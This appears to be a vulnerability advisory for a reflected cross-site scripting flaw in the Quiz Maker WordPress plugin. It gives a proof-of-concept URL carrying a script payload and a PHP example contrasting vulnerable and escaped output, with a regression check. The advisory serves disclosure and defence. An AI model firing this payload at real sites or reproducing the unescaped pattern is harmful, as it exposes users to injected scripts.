WordPress Plugin Vulnerabilities
Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting
Description
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
Proof of Concept
Visit the following URL: https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E=something
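The class of bug described above, shown as an added example that is not the plugin's own code: a URL derived from the current request is written into an href attribute, first unescaped and then escaped at the point of output. The helper names, the "paged" argument and the markup are hypothetical; the request is constructed from the proof-of-concept URL.

```php
<?php
// Constructed request modelled on the proof-of-concept URL: the markup sits
// in a query parameter *name*, so validating known parameters does not help.
$request_uri = '/wp-admin/admin.php?page=quiz-maker-questions'
             . '&fake%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E=something';

// Hypothetical helper: derive a pagination link from the current request.
function generate_url(string $request_uri, int $page): string {
    return urldecode($request_uri) . '&paged=' . $page;
}

// Vulnerable pattern: the generated URL goes into the attribute as-is.
function render_unescaped(string $url): string {
    return '<a class="next-page" href="' . $url . '">Next</a>';
}

// Hardened pattern: escape at the point of output. In WordPress code this is
// the job of esc_url() / esc_attr(); htmlspecialchars() keeps the example
// runnable without WordPress loaded.
function render_escaped(string $url): string {
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a class="next-page" href="' . $safe . '">Next</a>';
}

// Regression check: parse the markup and count <script> elements in it.
function count_script_tags(string $html): int {
    libxml_use_internal_errors(true);   // tolerate fragment-level parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

$url = generate_url($request_uri, 2);
foreach (['render_unescaped', 'render_escaped'] as $renderer) {
    $html = $renderer($url);
    printf("%s\n  %s\n  script elements: %d\n",
           $renderer, $html, count_script_tags($html));
}
```

The same parse-and-count check can be kept as a regression test for any admin screen that builds links from the current request.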
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-30 (about 5 months ago)
Added
2023-11-30 (about 5 months ago)
Last Updated
2023-11-30 (about 5 months ago)